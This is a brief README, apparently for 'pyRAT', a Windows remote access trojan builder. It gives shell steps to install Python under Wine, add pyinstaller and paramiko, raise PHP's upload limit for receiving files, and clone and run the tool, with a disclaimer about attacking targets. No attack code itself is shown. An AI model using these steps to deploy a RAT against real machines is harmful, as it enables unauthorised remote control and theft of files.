Windows Remote Administration Tool (RAT)
Usage of pyRAT for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
bash install.sh
wget https://www.python.org/ftp/python/2.7.15/python-2.7.15.msi
wine msiexec /i python-2.7.15.msi /L*v log.txt
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
cd ~/.wine/drive_c/Python27/
wine python.exe Scripts/pip.exe install pyinstaller paramiko
#Configuring PHP (received file size)
sed -i -e 's+upload_max_filesize = 2M+upload_max_filesize = 100M+g' $(php -i | grep -i "loaded configuration file" | cut -d ">" -f2)
git clone https://github.com/thelinuxchoice/pyRAT
cd pyRAT
bash pyrat.sh
Support the authors:
https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CLKRT5QXXFJY4&source=url